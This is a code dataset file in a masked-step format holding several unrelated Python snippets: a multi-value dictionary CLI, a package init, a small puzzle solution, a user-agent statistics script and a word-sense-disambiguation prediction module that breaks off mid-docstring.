app.run(debug=True)\n", "step-ids": [ 7, 9, 10, 12, 13 ] }
[ 7, 9, 10, 12, 13 ]
from src.MultiValueDictApp import MultiValueDictApp def main(): app = MultiValueDictApp() print("Welcome to Multivalue Dictionary App") print("COMMANDS and format:") print("KEYS") print("MEMBERS key") print("ADD key value") print("REMOVE key value") print("REMOVEALL key") print("CLEAR") print("KEYEXISTS key") print("VALUEEXISTS key value") print("ALLMEMBERS") print("ITEMS") print("EXIT") print("Enter COMMAND key value below") print("---------------------------------------") print("") while True: command, *args = input().split(' ') app.run(command, args) if __name__ == "__main__": main()
normal
{ "blob_id": "21e83369c4100c41885e9ee8a8d7310556bfe51d", "index": 7271, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n app = MultiValueDictApp()\n print('Welcome to Multivalue Dictionary App')\n print('COMMANDS and format:')\n print('KEYS')\n print('MEMBERS key')\n print('ADD key value')\n print('REMOVE key value')\n print('REMOVEALL key')\n print('CLEAR')\n print('KEYEXISTS key')\n print('VALUEEXISTS key value')\n print('ALLMEMBERS')\n print('ITEMS')\n print('EXIT')\n print('Enter COMMAND key value below')\n print('---------------------------------------')\n print('')\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main():\n app = MultiValueDictApp()\n print('Welcome to Multivalue Dictionary App')\n print('COMMANDS and format:')\n print('KEYS')\n print('MEMBERS key')\n print('ADD key value')\n print('REMOVE key value')\n print('REMOVEALL key')\n print('CLEAR')\n print('KEYEXISTS key')\n print('VALUEEXISTS key value')\n print('ALLMEMBERS')\n print('ITEMS')\n print('EXIT')\n print('Enter COMMAND key value below')\n print('---------------------------------------')\n print('')\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "from src.MultiValueDictApp import MultiValueDictApp\n\n\ndef main():\n app = MultiValueDictApp()\n print('Welcome to Multivalue Dictionary App')\n print('COMMANDS and format:')\n print('KEYS')\n print('MEMBERS key')\n print('ADD key value')\n print('REMOVE key value')\n print('REMOVEALL key')\n print('CLEAR')\n print('KEYEXISTS key')\n print('VALUEEXISTS key value')\n print('ALLMEMBERS')\n print('ITEMS')\n print('EXIT')\n print('Enter COMMAND key value below')\n print('---------------------------------------')\n print('')\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "from src.MultiValueDictApp import MultiValueDictApp\n\ndef main():\n app = MultiValueDictApp()\n print(\"Welcome to Multivalue Dictionary App\")\n print(\"COMMANDS and format:\")\n print(\"KEYS\")\n print(\"MEMBERS key\")\n print(\"ADD key value\")\n print(\"REMOVE key value\")\n print(\"REMOVEALL key\")\n print(\"CLEAR\")\n print(\"KEYEXISTS key\")\n print(\"VALUEEXISTS key value\")\n print(\"ALLMEMBERS\")\n print(\"ITEMS\")\n print(\"EXIT\")\n print(\"Enter COMMAND key value below\")\n print(\"---------------------------------------\")\n print(\"\")\n\n while True:\n command, *args = input().split(' ')\n app.run(command, args)\n\nif __name__ == \"__main__\":\n main()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from __future__ import absolute_import from . import utils from . import bert_model from . import transformer from .utils import * from .bert_model import * from .transformer import *
normal
{ "blob_id": "6415b08795975698e8e2019cafb82561b35f8e71", "index": 2037, "step-1": "<mask token>\n", "step-2": "from __future__ import absolute_import\nfrom . import utils\nfrom . import bert_model\nfrom . import transformer\nfrom .utils import *\nfrom .bert_model import *\nfrom .transformer import *\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
S = input() T = int(input()) B = abs(S.count('L') - S.count('R')) + abs(S.count('U') - S.count('D')) print(B + S.count('?') if T == 1 else max(B - S.count('?'), (B - S.count( '?')) % 2))
normal
{ "blob_id": "ce263424b856c07e04bd66cda7ebda646583b1fe", "index": 5962, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(B + S.count('?') if T == 1 else max(B - S.count('?'), (B - S.count(\n '?')) % 2))\n", "step-3": "S = input()\nT = int(input())\nB = abs(S.count('L') - S.count('R')) + abs(S.count('U') - S.count('D'))\nprint(B + S.count('?') if T == 1 else max(B - S.count('?'), (B - S.count(\n '?')) % 2))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import os import factorStatFileCreator dirName = 'NoPerms/' dirName2 = 'AllPerms/' freqAgentDic = dict() lenAgentDic = dict() contAgentDic = dict() def freqModAvgFunc(dirName): fullList = factorStatFileCreator.directoryFreq(dirName) UA = dirName.split("/")[1] avgList = [] sum = 0 i = 0 while i <= len(fullList) - 2: diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i+1]) if diff == None: i+=1 else: avgList.append(int(diff)) i+=1 for item in avgList: sum += item if len(avgList) != 0: if UA not in freqAgentDic.keys(): freqAgentDic[UA] = [sum/len(avgList)] else: agentList = freqAgentDic[UA] agentList.append(sum/len(avgList)) freqAgentDic[UA] = agentList def finalFreqFunc(dirName): for filename in os.listdir(dirName): file = dirName + filename freqModAvgFunc(file) def printFreqDiff(): finalFreqFunc(dirName) finalFreqFunc(dirName2) #print (freqAgentDic) for keys, vals in freqAgentDic.items(): if len(vals) > 1 and vals[1] > 0: score = vals[0] / vals[1] print ("{:<15}: {:.2f}".format(keys,score)) else: score = "N/A" print ("{:<15}: {}".format(keys,score)) freqAgentDic[keys] = score return (freqAgentDic) def avgModFunc(directory): sum = 0 UA = directory.split("/")[1] byteList = factorStatFileCreator.directoryLen(directory) for item in byteList: sum += item if len(byteList) != 0: if UA not in lenAgentDic.keys(): lenAgentDic[UA] = [sum/len(byteList)] else: agentList = lenAgentDic[UA] agentList.append(sum/len(byteList)) lenAgentDic[UA] = agentList def finalLenFunc(dirName): for filename in os.listdir(dirName): file = dirName + filename avgModFunc(file) def printLenDiff(): finalLenFunc(dirName) finalLenFunc(dirName2) for keys, vals in lenAgentDic.items(): if len(vals) > 1 and vals[1] > 0: score = vals[1] / vals[0] print ("{:<15}: {:.2f}".format(keys,score)) else: score = "N/A" print ("{:<15}: {}".format(keys,score)) lenAgentDic[keys] = score return lenAgentDic def directoryModCont(directory): contentSet = set() newSet = set() listHolder = [] numofReq = 0 UA = directory.split("/")[1] for filename in os.listdir(directory): file = directory + '/' + filename listHolder = factorStatFileCreator.contentCommand(file) #print(newSet) newSet = listHolder[0] numofReq += len(listHolder[1]) contentSet = contentSet|newSet newSet = set() if UA not in contAgentDic.keys(): contAgentDic[UA] = [numofReq] else: agentList = contAgentDic[UA] agentList.append(numofReq) contAgentDic[UA] = agentList return contentSet, numofReq def finalContFunc(dirName): for filename in os.listdir(dirName): file = dirName + filename directoryModCont(file) def printContDiff(): finalContFunc(dirName) finalContFunc(dirName2) for keys, vals in contAgentDic.items(): if len(vals) > 1 and vals[1] > 0: score = vals[0] / vals[1] print ("{:<15}: {:.2f}".format(keys,score)) else: score = "N/A" print ("{:<15}: {}".format(keys,score)) contAgentDic[keys] = score return contAgentDic
normal
{ "blob_id": "8ac84aa29e9e4f3b85f1b3c27819feb5f41e8d8e", "index": 598, "step-1": "<mask token>\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\n<mask token>\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\n<mask token>\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-2": "<mask token>\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n 
print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\n<mask token>\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-3": "<mask token>\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\ndef avgModFunc(directory):\n sum = 0\n UA = directory.split('/')[1]\n byteList = factorStatFileCreator.directoryLen(directory)\n for item in byteList:\n sum += item\n if len(byteList) != 0:\n if UA not in lenAgentDic.keys():\n lenAgentDic[UA] = [sum / len(byteList)]\n else:\n agentList = lenAgentDic[UA]\n agentList.append(sum / len(byteList))\n lenAgentDic[UA] = agentList\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef 
directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-4": "<mask token>\ndirName = 'NoPerms/'\ndirName2 = 'AllPerms/'\nfreqAgentDic = dict()\nlenAgentDic = dict()\ncontAgentDic = dict()\n\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split('/')[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i + 1])\n if diff == None:\n i += 1\n else:\n avgList.append(int(diff))\n i += 1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum / len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum / len(avgList))\n freqAgentDic[UA] = agentList\n\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n freqAgentDic[keys] = score\n return freqAgentDic\n\n\ndef avgModFunc(directory):\n sum = 0\n UA = directory.split('/')[1]\n byteList = factorStatFileCreator.directoryLen(directory)\n for item in byteList:\n sum += item\n if len(byteList) != 0:\n if UA not in lenAgentDic.keys():\n lenAgentDic[UA] = [sum / len(byteList)]\n else:\n agentList = lenAgentDic[UA]\n agentList.append(sum / len(byteList))\n lenAgentDic[UA] = agentList\n\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split('/')[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet | newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = 
contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print('{:<15}: {:.2f}'.format(keys, score))\n else:\n score = 'N/A'\n print('{:<15}: {}'.format(keys, score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-5": "import os\nimport factorStatFileCreator\n\ndirName = 'NoPerms/'\ndirName2 = 'AllPerms/'\n\nfreqAgentDic = dict()\nlenAgentDic = dict()\ncontAgentDic = dict()\n\ndef freqModAvgFunc(dirName):\n fullList = factorStatFileCreator.directoryFreq(dirName)\n UA = dirName.split(\"/\")[1]\n avgList = []\n sum = 0\n i = 0\n while i <= len(fullList) - 2:\n diff = factorStatFileCreator.diffFunc(fullList[i], fullList[i+1])\n if diff == None:\n i+=1\n else:\n avgList.append(int(diff))\n i+=1\n for item in avgList:\n sum += item\n if len(avgList) != 0:\n if UA not in freqAgentDic.keys():\n freqAgentDic[UA] = [sum/len(avgList)]\n else:\n agentList = freqAgentDic[UA]\n agentList.append(sum/len(avgList))\n freqAgentDic[UA] = agentList\n\ndef finalFreqFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n freqModAvgFunc(file)\n\ndef printFreqDiff():\n finalFreqFunc(dirName)\n finalFreqFunc(dirName2)\n #print (freqAgentDic)\n for keys, vals in freqAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print (\"{:<15}: {:.2f}\".format(keys,score))\n else:\n score = \"N/A\"\n print (\"{:<15}: {}\".format(keys,score))\n freqAgentDic[keys] = score\n return (freqAgentDic)\n\ndef avgModFunc(directory):\n sum = 0\n UA = directory.split(\"/\")[1]\n byteList = factorStatFileCreator.directoryLen(directory)\n for item in byteList:\n sum += item\n if len(byteList) != 0:\n if UA not in lenAgentDic.keys():\n lenAgentDic[UA] = [sum/len(byteList)]\n else:\n agentList = lenAgentDic[UA]\n agentList.append(sum/len(byteList))\n lenAgentDic[UA] = agentList\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print (\"{:<15}: {:.2f}\".format(keys,score))\n else:\n score = \"N/A\"\n print (\"{:<15}: {}\".format(keys,score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split(\"/\")[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n #print(newSet)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet|newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n 
print (\"{:<15}: {:.2f}\".format(keys,score))\n else:\n score = \"N/A\"\n print (\"{:<15}: {}\".format(keys,score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-ids": [ 7, 8, 9, 10, 12 ] }
[ 7, 8, 9, 10, 12 ]
from model import WSD from data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex from typing import List, Dict, Tuple from prova import convert_sentence_to_features_no_padding import numpy as np import os from nltk.corpus import wordnet mfs_counter = 0 def predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None: global mfs_counter """ DO NOT MODIFY THE SIGNATURE! This is the skeleton of the prediction function. The predict function will build your model, load the weights from the checkpoint and write a new file (output_path) with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n"). The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission. N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code. If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. :return: None """ print(">>>> BABELNET PREDICTION") prediction_results, sentences_xml_elements = __predict(input_path,resources_path) vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn') correctly_saved = 0 filename = os.path.normpath(input_path) filename = filename.split(os.sep)[-1] filename = filename[:-3]+"babelnet.gold.key.txt" for index in range(len(prediction_results)): correctly_saved += __write_result(filename, sentences_xml_elements[index], resources_path, output_path, prediction_results[index][0][0], vocab=vocab_label_bn, enable_coarse_grained=1, vocab_for_coarse=None) print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results))) del prediction_results print("Of these, {} were MFS".format(mfs_counter)) mfs_counter = 0 return def predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None: """ DO NOT MODIFY THE SIGNATURE! This is the skeleton of the prediction function. The predict function will build your model, load the weights from the checkpoint and write a new file (output_path) with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport"). The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission. N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code. If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. 
:return: None """ global mfs_counter print(">>>> WORDNET DOMAINS PREDICTION") prediction_results, sentences_xml_elements = __predict(input_path,resources_path) vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn') correctly_saved = 0 bn2wndom = get_bn2wndomains() filename = os.path.normpath(input_path) filename = filename.split(os.sep)[-1] filename = filename[:-3]+"wndomains.gold.key.txt" for index in range(len(prediction_results)): correctly_saved += __write_result(filename, sentences_xml_elements[index], resources_path, output_path, prediction_results[index][1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2, vocab_for_coarse=bn2wndom) print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results))) del prediction_results print("Of these, {} were MFS".format(mfs_counter)) mfs_counter = 0 return def predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None: """ DO NOT MODIFY THE SIGNATURE! This is the skeleton of the prediction function. The predict function will build your model, load the weights from the checkpoint and write a new file (output_path) with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal"). The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission. N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code. If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. :return: None """ global mfs_counter print(">>>> LEXICOGRAPHER PREDICTION") prediction_results, sentences_xml_elements = __predict(input_path, resources_path) vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex') correctly_saved = 0 filename = os.path.normpath(input_path) filename = filename.split(os.sep)[-1] bn2lex = get_bn2lex() filename = filename[:-3] + "lexicon.gold.key.txt" for index in range(len(prediction_results)): correctly_saved += __write_result(filename, sentences_xml_elements[index], resources_path,output_path, prediction_results[index][2][0], vocab= vocab_label_lex, enable_coarse_grained=3, vocab_for_coarse=bn2lex) print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results))) del prediction_results print("Of these, {} were MFS".format(mfs_counter)) mfs_counter = 0 return def __predict(input_path : str, resources_path : str) -> Tuple: """ Actually predicts a sentence and returns the predictions in the requested formats :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. 
:return: The actual prediction by the network """ train, etree_data = load_dataset(input_path) train = [dato for dato in train if dato] vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn') vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn') vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex') modello = WSD(resources_path+"/vocabularies/bert_vocab.txt", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003) tokenizatore = modello.tokenizatore modello.model.load_weights(resources_path+"/saved_model/model_20_2.14.h5") to_return = [] sentences_xml_elements = etree_data.xpath("/*/*/*") for sentence in train: feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore) results = modello.model.predict( {'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1 ) to_return.append(results) del vocab_label_lex del vocab_label_wndmn del vocab_label_bn return to_return, sentences_xml_elements def __write_result(filename: str, frase, resources_path: str, outputh_path: str, predictions, vocab = None, enable_coarse_grained: int = 1, vocab_for_coarse = None) -> int: """ Write results in the file system :param filename: the name of the file to save :param frase: the object from which recover the sentence :param resources_path: the path of the resources folder containing your model and stuff you might need. :param output_path: the path of the output file (where you save your predictions) :param predictions: the predictions made by the system :param vocab: the vocab needed for giving a sense :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values: 1 --> Means I'm predicting with Babelnet. No extra precautions needed 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead 3 --> Means I'm predicting with Lexicon. Need to consult the vocab. 
:param vocab_for_coarse: The vocab in support of mode 2 or 3 :return: 1 if succeeds """ global mfs_counter bn2wn = get_bn2wn() lemma2wn = reload_word_mapping(resources_path+"/mapping/lemma2wn.txt") to_write = [] for index, parola in enumerate(frase): name = parola.xpath('name()') if name == 'instance': id = parola.get('id') list_of_possible_senses_first_step = lemma2wn.get(parola.text) if not list_of_possible_senses_first_step: # MFS the_actual_meaning = MFS(parola, bn2wn, vocab2=vocab_for_coarse, pred_case=enable_coarse_grained) mfs_counter += 1 to_write.append((id, the_actual_meaning)) continue list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn) candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version, parola.text, vocab, predictions[index], enable_coarse_grained=enable_coarse_grained) the_actual_meaning = None if candidates: argmax = np.argmax(candidates) the_actual_meaning = list_of_possible_senses_bn_version[argmax] else: #MFS mfs_counter += 1 the_actual_meaning = MFS(parola, bn2wn, vocab2=vocab_for_coarse, pred_case=enable_coarse_grained) to_write.append((id, the_actual_meaning)) with open(outputh_path + "/"+filename, "a") as test_saving: for tupla in to_write: test_saving.write(tupla[0] + " " + tupla[1]+"\n") del to_write del lemma2wn del bn2wn return 1 def MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str: """ Returns the sense by applying the Most Frequent Sense (MFS) strategy :param parola: the Element object to which associate a sense :param vocab: the vocab needed for giving a sense :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values: 1 --> Means I'm predicting with Babelnet. No extra precautions needed 2 --> Means 